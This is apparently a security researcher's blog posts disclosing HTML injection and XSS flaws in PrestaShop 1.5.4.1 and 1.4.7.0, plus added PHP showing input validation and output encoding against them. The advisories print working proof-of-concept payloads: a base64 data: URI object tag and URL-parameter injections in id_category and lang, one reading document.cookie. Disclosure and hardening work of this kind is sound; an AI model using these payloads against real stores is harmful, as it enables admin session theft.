In the last few days I started to check the code of the latest PrestaShop and I found a few vulnerabilities
in the code.
This post will be updated as soon as the vendor answers with what they think about it.
Friday, 31 January 2014
Thursday, 2 May 2013
[EN] PrestaShop 1.5.4.1 HTML Injection
This is a very nice e-commerce shop, but I think using this preg_match:
will not secure us from HTML injection attacks.
[Image: preg_match() in latest PrestaShop]
See the screen below to understand where and how we can input HTML tags:
[Image: How to exploit PrestaShop via BurpSuite]
... and yes, this vulnerability exists in the admin part of the application. ;)
* UPDATE *
After a few minutes I got the idea of how to extend this HTML injection attack to XSS, and...
there is an XSS vulnerability :)
A screenshot of the attack is below, but the payload string will not be published until the vendor responds.
[Image: PrestaShop - Admin XSSed]
* UPDATE - 17.05.2013 *
Ok, still no response from vendor... :)
The proof-of-concept code to inject XSS in PrestaShop should be a payload encoded in base64:
Here we have a little example:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Tadam... ;]
Cheers o/
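
Why a pattern check on input does not stop the data: URI payload above while encoding at output does, as an added example that is not from the original post or from PrestaShop. The denylist regex and the function names are hypothetical stand-ins, since the post's preg_match() is only shown in a screenshot.

```php
<?php
// Added example, not PrestaShop code. The denylist below is a hypothetical
// stand-in for a preg_match()-based input check.
function passes_denylist(string $value): bool
{
    return preg_match('/<\s*script\b|javascript:|\bon\w+\s*=/i', $value) !== 1;
}

// Unsafe: the stored value is placed into the page as markup.
function render_unsafe(string $value): string
{
    return '<td>' . $value . '</td>';
}

// Hardened: encode for the HTML context at output time,
// whatever the input check decided earlier.
function render_encoded(string $value): string
{
    return '<td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Payload quoted in the post: the script text only exists after the browser
// base64-decodes the data: URI, so a pattern looking for "<script" never sees it.
$b64     = 'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==';
$payload = '<object data="data:text/html;base64,' . $b64 . '"></object>';

$report = [
    'denylist accepts stored value'   => passes_denylist($payload),
    'denylist accepts decoded script' => passes_denylist(base64_decode($b64, true)),
    'unsafe output'                   => render_unsafe($payload),
    'encoded output'                  => render_encoded($payload),
];

foreach ($report as $label => $value) {
    printf("%-32s %s\n", $label, is_bool($value) ? var_export($value, true) : $value);
}
```

The encoded output contains no `<object>` element, so the browser never loads the data: URI; the fix belongs in the template or output layer rather than in a longer denylist.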
Sunday, 18 March 2012
[EN]PrestaShop 1.4.7.0 - XSS-over-GET for/from admin
# TITLE ....... # XSS-over-GET in PrestaShop 1.4.7.0 (for/from admin only) .... #
# DATE ........ # 14.03.2012 ................................................. #
# AUTHOR ...... # http://hauntit.blogspot.com ................................ #
# SOFT LINK ... # http://www.prestashop.com .................................. #
# VERSION ..... # 1.4.7.0 .................................................... #
# TESTED ON ... # LAMP ....................................................... #
# ............................................................................ #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
Simple XSS, this time "for admin user only".
What does that mean:
To see the vulnerability, go to your login page and log in as an admin.
Next, in the URL bar, type the URL from 3).
#............................................#
# 3. Where is bug :)
http://prestashop_1.4.7.0/prestashop/admin12/index.php?tab=AdminCatalog&id_category=");<img src=moc onerror=alert(141012)>&categoryOrderby=name&categoryOrderway=asc&token=token
The vulnerable parameter is id_category.
By the way, there is one funny thing I found in this webapp too:
when you set the parameter 'categoryOrderby' to '//%e00' (without the quotes), the response will be 200 but the page will be... 'changed' ;]
hf
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
[EN] PrestaShop 1.4.7.0 - XSS for logged-in users
# TITLE ....... # PrestaShop 1.4.7.0 XSS for logged-in users ............ #
# DATE ........ # 14.03.2012 ............................................ #
# AUTHOR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.
#............................................#
# 3. Where is bug :)
Log in as your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token
#............................................#
# 4. More...
- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
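
How the two reflected parameters from the 1.4.7.0 advisories above (id_category and lang) can be validated by type before use and encoded when echoed, as an added example that is not PrestaShop code. The function names are hypothetical, and the language-code format accepted for lang is an assumption.

```php
<?php
// Added example, not PrestaShop code; function names are hypothetical.

// id_category is a numeric identifier: accept only a non-negative integer.
function read_category_id(array $query): ?int
{
    $id = filter_var($query['id_category'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// Assumption: lang is a short language code such as "en" or "pt-br".
function read_lang(array $query): ?string
{
    $lang = $query['lang'] ?? '';
    $ok = is_string($lang) && preg_match('/\A[a-z]{2}(-[a-z]{2})?\z/i', $lang) === 1;
    return $ok ? $lang : null;
}

// Encode anything that is echoed back into HTML, including rejected input
// that ends up in an error message or a log viewer.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed requests: the two parameter values from the advisories,
// each next to a benign value for comparison.
$requests = [
    ['id_category' => '");<img src=moc onerror=alert(141012)>'],
    ['id_category' => '12'],
    ['lang' => '/*<script>alert(document.cookie)</script>/*'],
    ['lang' => 'en'],
];

foreach ($requests as $query) {
    foreach ($query as $name => $raw) {
        $clean = $name === 'id_category' ? read_category_id($query) : read_lang($query);
        printf("%-12s %-7s %s\n", $name, $clean === null ? 'REJECT' : 'ACCEPT', e($raw));
    }
}
```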